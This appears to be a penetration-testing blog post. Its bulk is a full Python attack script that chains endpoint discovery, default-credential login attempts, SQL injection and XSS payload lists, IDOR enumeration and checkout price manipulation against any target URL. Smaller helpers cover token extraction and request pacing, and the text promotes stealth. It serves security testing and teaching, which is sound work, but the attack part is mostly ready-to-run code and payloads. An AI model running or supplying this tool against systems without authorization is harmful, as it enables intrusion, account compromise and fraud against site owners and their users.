In penetration testing and red teaming, many attacks are not just a single request, but a workflow: login → capture token → replay token → exploit vulnerable endpoint. Manually repeating these steps can be slow, noisy, and prone to error.
That’s where custom Python scripts built on the requests library shine. By chaining multiple HTTP requests together, you can automate the multi-step workflows that attackers and testers routinely need.
Why Custom Scripts?
While tools like Burp Suite, OWASP ZAP, or Postman are excellent, sometimes you need more flexibility:
- Repeatability – run the same workflow across multiple targets.
- Logic chaining – capture a value (CSRF token, session cookie, API key) from one step and use it in the next.
- Speed – automate hundreds of attempts without manual clicking.
- Stealth – script-based attacks can blend in with “normal” user requests.
Example Workflow Attack
Let’s imagine a target app with the following flow:
- Log in with credentials.
- Capture the JWT from the response.
- Use the token to access a protected API endpoint.
- Exploit a vulnerable parameter in that endpoint.
Here’s how a script might look:
```python
#!/usr/bin/env python3
"""
Workflow Attack Chaining Script
Author: Security Researcher
Description: Chains multiple web application attacks for penetration testing
"""

import argparse
import json
import sys
import time
from urllib.parse import parse_qs, urljoin

import requests
from bs4 import BeautifulSoup


class WorkflowAttackChainer:
    def __init__(self, target_url, cookies=None, headers=None):
        self.target_url = target_url
        self.session = requests.Session()
        self.csrf_tokens = {}
        self.discovered_endpoints = []
        self.vulnerabilities = []

        # Default headers, applied first so caller-supplied headers can override them
        default_headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Language': 'en-US,en;q=0.5',
            'Accept-Encoding': 'gzip, deflate',
            'Connection': 'keep-alive',
            'Upgrade-Insecure-Requests': '1'
        }
        self.session.headers.update(default_headers)

        # Set custom headers if provided
        if headers:
            self.session.headers.update(headers)

        # Set cookies if provided
        if cookies:
            self.session.cookies.update(cookies)

    def discover_endpoints(self, max_depth=2):
        """Discover endpoints through spidering and common paths"""
        # max_depth is currently unused: only the homepage is spidered
        print(f"[*] Discovering endpoints on {self.target_url}")

        common_paths = [
            '/admin', '/login', '/logout', '/register', '/profile',
            '/api', '/config', '/backup', '/upload', '/download',
            '/test', '/debug', '/console', '/phpinfo', '/.git',
            '/robots.txt', '/sitemap.xml', '/crossdomain.xml'
        ]

        # Check common paths
        for path in common_paths:
            full_url = urljoin(self.target_url, path)
            try:
                response = self.session.get(full_url, timeout=10)
                if response.status_code < 400:
                    self.discovered_endpoints.append({
                        'url': full_url,
                        'method': 'GET',
                        'status': response.status_code
                    })
                    print(f"[+] Found: {full_url} ({response.status_code})")
            except requests.RequestException:
                continue

        # Basic spidering from homepage
        try:
            response = self.session.get(self.target_url, timeout=10)
            soup = BeautifulSoup(response.text, 'html.parser')

            for link in soup.find_all('a', href=True):
                href = link['href']
                if href.startswith(('http://', 'https://')):
                    # Keep absolute links only when they point at the target
                    if self.target_url in href:
                        self.discovered_endpoints.append({
                            'url': href,
                            'method': 'GET',
                            'status': 'unknown'
                        })
                elif href.startswith('/'):
                    full_url = urljoin(self.target_url, href)
                    self.discovered_endpoints.append({
                        'url': full_url,
                        'method': 'GET',
                        'status': 'unknown'
                    })
        except requests.RequestException as e:
            print(f"[-] Error during spidering: {e}")

    def extract_csrf_tokens(self, response):
        """Extract CSRF tokens from response"""
        soup = BeautifulSoup(response.text, 'html.parser')
        tokens = {}

        # Look for CSRF tokens in various forms
        for input_tag in soup.find_all('input'):
            name = input_tag.get('name', '')
            value = input_tag.get('value', '')
            if not name:
                continue

            # Match case-insensitively, but keep the original field name:
            # the server expects it unchanged when the form is posted back
            lowered = name.lower()
            is_hidden = input_tag.get('type', '').lower() == 'hidden'
            if any(keyword in lowered for keyword in ['csrf', 'token', '_token', 'authenticity']):
                tokens[name] = value
            elif is_hidden and value and len(value) > 20:  # Potential token
                tokens[name] = value

        return tokens

    def test_sql_injection(self, url, params):
        """Test for SQL injection vulnerabilities"""
        print(f"[*] Testing SQLi on {url}")

        sql_payloads = [
            "'",
            "';",
            "' OR '1'='1",
            "' UNION SELECT NULL--",
            "1' ORDER BY 1--",
            "1' AND 1=1--",
            "1' AND 1=2--"
        ]

        # Common SQL error messages. These substrings are broad, so a hit is
        # only a lead to verify manually, not proof of injection
        error_indicators = [
            'sql', 'mysql', 'ora-', 'syntax', 'database',
            'query failed', 'you have an error'
        ]

        for payload in sql_payloads:
            test_params = params.copy()
            for key in test_params:
                if isinstance(test_params[key], str):
                    test_params[key] += payload

            try:
                response = self.session.get(url, params=test_params, timeout=10)

                if any(indicator in response.text.lower() for indicator in error_indicators):
                    self.vulnerabilities.append({
                        'type': 'SQL Injection',
                        'url': url,
                        'payload': payload,
                        'evidence': 'Error message in response'
                    })
                    print(f"[!] Potential SQLi found with payload: {payload}")
                    break
            except requests.RequestException:
                continue

    def test_xss(self, url, params):
        """Test for XSS vulnerabilities"""
        print(f"[*] Testing XSS on {url}")

        xss_payloads = [
            '<script>alert(1)</script>',
            '"><script>alert(1)</script>',
            'javascript:alert(1)',
            'onmouseover=alert(1)',
            '<img src=x onerror=alert(1)>'
        ]

        for payload in xss_payloads:
            test_params = params.copy()
            for key in test_params:
                if isinstance(test_params[key], str):
                    test_params[key] = payload

            try:
                response = self.session.get(url, params=test_params, timeout=10)

                # Unescaped reflection is a lead; execution still depends on context
                if payload in response.text:
                    self.vulnerabilities.append({
                        'type': 'XSS',
                        'url': url,
                        'payload': payload,
                        'evidence': 'Payload reflected in response'
                    })
                    print(f"[!] Potential XSS found with payload: {payload}")
                    break
            except requests.RequestException:
                continue

    def test_idor(self, url_pattern, id_range=(1, 100)):
        """Test for Insecure Direct Object References"""
        print(f"[*] Testing IDOR on pattern: {url_pattern}")

        for obj_id in range(id_range[0], id_range[1] + 1):
            test_url = url_pattern.replace('{id}', str(obj_id))
            try:
                response = self.session.get(test_url, timeout=10)
                # A 200 alone does not prove IDOR: confirm that the object
                # belongs to a different user than the current session
                if response.status_code == 200 and len(response.content) > 0:
                    self.vulnerabilities.append({
                        'type': 'IDOR',
                        'url': test_url,
                        'evidence': f'Access to object ID {obj_id} possible'
                    })
                    print(f"[!] Potential IDOR found: {test_url}")
            except requests.RequestException:
                continue

    def chain_authentication_attack(self):
        """Chain authentication-related attacks"""
        print("[*] Chaining authentication attacks...")

        # Test for weak credentials
        weak_creds = [
            ('admin', 'admin'),
            ('admin', 'password'),
            ('test', 'test'),
            ('user', 'user')
        ]

        login_url = urljoin(self.target_url, '/login')

        for username, password in weak_creds:
            try:
                # Get login page to extract CSRF token
                response = self.session.get(login_url, timeout=10)
                csrf_tokens = self.extract_csrf_tokens(response)

                login_data = {
                    'username': username,
                    'password': password
                }
                login_data.update(csrf_tokens)

                # Attempt login
                response = self.session.post(login_url, data=login_data, timeout=10)

                # Success is inferred from the post-login redirect target
                if any(indicator in response.url.lower() for indicator in ['dashboard', 'home', 'profile']):
                    self.vulnerabilities.append({
                        'type': 'Weak Credentials',
                        'url': login_url,
                        'credentials': f'{username}:{password}',
                        'evidence': 'Successful login with weak credentials'
                    })
                    print(f"[!] Weak credentials found: {username}:{password}")
                    break
            except requests.RequestException:
                continue

    def chain_business_logic_attack(self):
        """Chain business logic workflow attacks"""
        print("[*] Chaining business logic attacks...")

        # Example: Test for price manipulation
        cart_url = urljoin(self.target_url, '/cart')
        checkout_url = urljoin(self.target_url, '/checkout')

        try:
            # Add item to cart
            add_to_cart_data = {'product_id': '1', 'quantity': '1'}
            self.session.post(cart_url, data=add_to_cart_data, timeout=10)

            # Modify price in checkout
            checkout_data = {
                'items': '[{"id":1,"price":0.01,"quantity":1}]',
                'total': '0.01'
            }
            response = self.session.post(checkout_url, data=checkout_data, timeout=10)

            # Loose heuristic: a 200 can also be an error page, so confirm manually
            if 'success' in response.text.lower() or response.status_code == 200:
                self.vulnerabilities.append({
                    'type': 'Business Logic - Price Manipulation',
                    'url': checkout_url,
                    'evidence': 'Able to modify prices during checkout'
                })
                print("[!] Price manipulation vulnerability found!")
        except requests.RequestException as e:
            print(f"[-] Business logic test failed: {e}")

    def generate_report(self):
        """Generate a comprehensive report"""
        report = {
            'target': self.target_url,
            'timestamp': time.strftime('%Y-%m-%d %H:%M:%S'),
            'endpoints_discovered': self.discovered_endpoints,
            'vulnerabilities_found': self.vulnerabilities
        }

        print("\n" + "=" * 60)
        print("SECURITY ASSESSMENT REPORT")
        print("=" * 60)
        print(f"Target: {self.target_url}")
        print(f"Endpoints Discovered: {len(self.discovered_endpoints)}")
        print(f"Vulnerabilities Found: {len(self.vulnerabilities)}")
        print("=" * 60)

        for vuln in self.vulnerabilities:
            print(f"\n[{vuln['type']}]")
            print(f"URL: {vuln['url']}")
            print(f"Evidence: {vuln['evidence']}")
            if 'payload' in vuln:
                print(f"Payload: {vuln['payload']}")
            print("-" * 40)

        # Save report to file
        filename = f"security_report_{time.strftime('%Y%m%d_%H%M%S')}.json"
        with open(filename, 'w') as f:
            json.dump(report, f, indent=2)
        print(f"\n[+] Report saved to {filename}")


def main():
    parser = argparse.ArgumentParser(description='Web Application Workflow Attack Chainer')
    parser.add_argument('-u', '--url', required=True, help='Target URL')
    parser.add_argument('-c', '--cookies', help='Cookies in format key1=value1;key2=value2')
    parser.add_argument('-H', '--headers', help='Custom headers in JSON format')
    parser.add_argument('-a', '--auth', help='Basic auth in format user:pass')
    parser.add_argument('-p', '--proxy', help='Proxy server (http://proxy:port)')

    args = parser.parse_args()

    # Initialize attacker
    attacker = WorkflowAttackChainer(args.url)

    # Set proxy if provided
    if args.proxy:
        attacker.session.proxies = {
            'http': args.proxy,
            'https': args.proxy
        }

    # Set auth if provided
    if args.auth:
        username, password = args.auth.split(':', 1)
        attacker.session.auth = (username, password)

    # Parse cookies
    if args.cookies:
        cookies = {}
        for cookie in args.cookies.split(';'):
            if '=' in cookie:
                key, value = cookie.split('=', 1)
                cookies[key.strip()] = value.strip()
        attacker.session.cookies.update(cookies)

    # Parse headers
    if args.headers:
        try:
            headers = json.loads(args.headers)
            attacker.session.headers.update(headers)
        except json.JSONDecodeError:
            print("[-] Invalid JSON format for headers")
            sys.exit(1)

    try:
        # Execute attack chain
        print(f"[*] Starting workflow attack chain against {args.url}")

        # Phase 1: Discovery
        attacker.discover_endpoints()

        # Phase 2: Authentication attacks
        attacker.chain_authentication_attack()

        # Phase 3: Test discovered endpoints
        for endpoint in attacker.discovered_endpoints[:10]:  # Limit to first 10
            if '?' in endpoint['url']:
                base_url, query = endpoint['url'].split('?', 1)
                # parse_qs returns lists; the test methods expect plain strings
                params = {key: values[0] for key, values in parse_qs(query).items()}

                # Test for SQLi and XSS
                attacker.test_sql_injection(base_url, params)
                attacker.test_xss(base_url, params)

        # Phase 4: Business logic attacks
        attacker.chain_business_logic_attack()

        # Phase 5: Generate report
        attacker.generate_report()

    except KeyboardInterrupt:
        print("\n[-] Scan interrupted by user")
        attacker.generate_report()
    except Exception as e:
        print(f"[-] Error during scanning: {e}")
        attacker.generate_report()


if __name__ == "__main__":
    main()
```
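The script above is a broad scanner and does not spell out the login → capture token → replay token flow described earlier. A minimal sketch of that chain might look like the following. The function name run_login_chain, the paths /api/login and /api/profile, and the token field in the JSON response are all hypothetical; the session argument is assumed to be a requests.Session or anything exposing the same post/get interface.

```python
from urllib.parse import urljoin


def run_login_chain(session, base_url, username, password, timeout=10):
    """Log in, capture a bearer token, then call a protected endpoint.

    `session` is expected to behave like requests.Session. The endpoint
    paths and the 'token' field name are assumptions for illustration.
    """
    # Step 1: log in with credentials (hypothetical JSON login endpoint).
    login = session.post(
        urljoin(base_url, "/api/login"),
        json={"username": username, "password": password},
        timeout=timeout,
    )
    login.raise_for_status()

    # Step 2: capture the token from the JSON body (assumed field name).
    token = login.json().get("token")
    if not token:
        raise RuntimeError("login succeeded but no 'token' field was returned")

    # Step 3: replay the token on a protected endpoint.
    profile = session.get(
        urljoin(base_url, "/api/profile"),
        headers={"Authorization": f"Bearer {token}"},
        timeout=timeout,
    )
    return token, profile
```

With the real library this would be called as run_login_chain(requests.Session(), "https://target.example", "alice", "s3cret"). The fourth step, probing a parameter on the protected endpoint, would reuse the same token and session.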
Key Techniques
- Session handling: requests.Session() persists cookies and default headers across requests, so a login in one step carries over to the next.
- Dynamic token extraction: parse JSON/HTML responses for CSRF tokens, JWTs, or session IDs.
- Parameter fuzzing: loop through payloads to test for injection vulnerabilities.
- Error handling: detect server responses that indicate misconfigurations or weak validation.
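Dynamic token extraction can be sketched with the standard library alone. The helper names below (extract_hidden_inputs, decode_jwt_claims) are hypothetical, and the sketch assumes tokens arrive either as hidden form fields or as a three-segment JWT. Note that decode_jwt_claims only reads the payload; it does not verify the signature.

```python
import base64
import json
from html.parser import HTMLParser


class _HiddenInputParser(HTMLParser):
    """Collects name/value pairs from <input type="hidden"> elements."""

    def __init__(self):
        super().__init__()
        self.hidden = {}

    def handle_starttag(self, tag, attrs):
        if tag != "input":
            return
        attributes = dict(attrs)
        is_hidden = (attributes.get("type") or "").lower() == "hidden"
        if is_hidden and attributes.get("name"):
            # Keep the field name exactly as served so it can be posted back.
            self.hidden[attributes["name"]] = attributes.get("value") or ""


def extract_hidden_inputs(html):
    """Return a dict of hidden form fields (where CSRF tokens usually live)."""
    parser = _HiddenInputParser()
    parser.feed(html)
    return parser.hidden


def decode_jwt_claims(token):
    """Decode the payload segment of a JWT without verifying its signature."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("not a JWT: expected three dot-separated segments")
    payload = parts[1]
    # JWTs strip base64 padding; restore it before decoding.
    payload += "=" * (-len(payload) % 4)
    return json.loads(base64.urlsafe_b64decode(payload))
```

The dict returned by extract_hidden_inputs can be merged straight into the form data for the next request, which is the same pattern the script uses in its login step.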
When to Use This
- Red Teaming – simulate realistic attacker workflows against your apps.
- Bug Bounties – chain multiple small issues into a bigger exploit.
- Pentesting – automate token harvesting, replay, or privilege escalation.
- DevSecOps Testing – integrate into pipelines for regression testing of known flaws.
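For the pipeline use case, a regression check can be as small as confirming that endpoints which once leaked data now reject unauthenticated requests. The sketch below is one possible shape, not a prescribed one: the function names and the choice of 401/403 as the "rejected" statuses are assumptions, and an app that redirects to a login page would need 3xx codes added to rejected_statuses.

```python
def requires_auth(session, url, rejected_statuses=(401, 403), timeout=10):
    """Return True if an unauthenticated GET to `url` is rejected.

    `session` is expected to behave like a fresh requests.Session with no
    credentials attached. Redirects are not followed, so a 302 to a login
    page is reported as its own status rather than as the login page's 200.
    """
    response = session.get(url, timeout=timeout, allow_redirects=False)
    return response.status_code in rejected_statuses


def find_unprotected(session, urls, rejected_statuses=(401, 403)):
    """Return the URLs from `urls` that answered without credentials."""
    return [
        url for url in urls
        if not requires_auth(session, url, rejected_statuses)
    ]
```

In a CI job, a non-empty result from find_unprotected would fail the build, turning a previously fixed flaw into a permanent regression test.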
Takeaways
Custom scripts with requests let you go beyond one-off requests. They allow you to chain steps into a complete workflow, making it easier to find and exploit vulnerabilities that would otherwise remain hidden.
Remember:
- Always test responsibly in authorized environments.
- Keep scripts modular so you can quickly adapt them for new targets.
- Automate smartly: don’t just blast requests; mimic real-world attack paths.
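One way to avoid blasting requests is to pace the loop that drives them. The generator below is a hypothetical helper (the name paced and its parameters are not from any library) that yields items with a base delay plus random jitter between them, which also helps keep a test within whatever request rate the engagement has agreed on.

```python
import random
import time


def paced(items, base_delay=1.0, jitter=0.5, sleep=time.sleep):
    """Yield each item, pausing between consecutive items.

    The pause is base_delay plus a random amount between 0 and jitter
    seconds. `sleep` is injectable so the pacing can be tested without
    actually waiting.
    """
    first = True
    for item in items:
        if not first:
            sleep(base_delay + random.uniform(0.0, jitter))
        first = False
        yield item
```

A payload loop then becomes for payload in paced(payloads): ... with no other changes to the request logic.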